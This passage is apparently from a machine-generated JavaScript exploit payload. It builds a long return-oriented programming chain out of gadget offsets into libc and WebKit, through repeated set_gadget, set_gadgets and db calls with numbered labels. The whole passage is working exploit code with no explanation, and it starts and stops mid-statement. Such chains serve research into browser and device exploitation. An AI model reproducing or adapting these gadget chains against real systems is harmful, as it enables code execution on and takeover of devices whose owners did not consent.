rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+591648, //L13147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13146: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L13147: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13148: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13149: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+591760, //L13150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+591776, //L13151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L13150: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L13151: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+591936, //L13155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+591904, //L13153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+591920, //L13154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13152: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13153: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13154: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13155: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+592040, //L13157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+592024, //L13156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13156: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13157: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+592136, //L13159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13158: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13159: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+592216, //L13161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L13161: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+592272, //L13162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13164: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L13165: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+592424, //L13167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13167: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+592480, //L13168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+592552, //L13171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13171: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+592608, //L13172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi 
; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+592696, //L13174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L13174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13175: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13176: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+592888, //L13180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+592856, //L13178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+592872, //L13179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13177: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13178: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13179: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13180: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+592992, //L13182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+592976, //L13181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+593088, //L13184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13183: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13184: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+593168, //L13186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13186: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+593224, //L13187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13187: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13189: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L13190: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+593376, //L13192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13192: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+593432, //L13193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13193: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+593504, //L13196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+593560, //L13197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13197: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L13199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L13201: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+593744, //L13204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+593728, //L13202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+593888, //L13207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+593856, //L13205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+593872, //L13206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13205: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13207: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+593968, //L13208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L13208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L13210: db([48, 0]); // 0x30 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+594088, //L13213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+594072, //L13211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13211: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13213: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+594264, //L13216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+594280, //L13217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+594232, //L13214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+594248, //L13215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13214: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L13215: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13216: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13217: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+594360, //L13218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+594376, //L13219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L13218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13219: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+594488, //L13222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+594456, //L13220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+144605 //pop rdi ]); //L13220: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L13221: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13222: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+594624, //L13224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+594640, //L13225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+594608, //L13223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L13223: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13224: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13225: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+594752, //L13226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+594784, //L13228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+594768, //L13227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13227: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0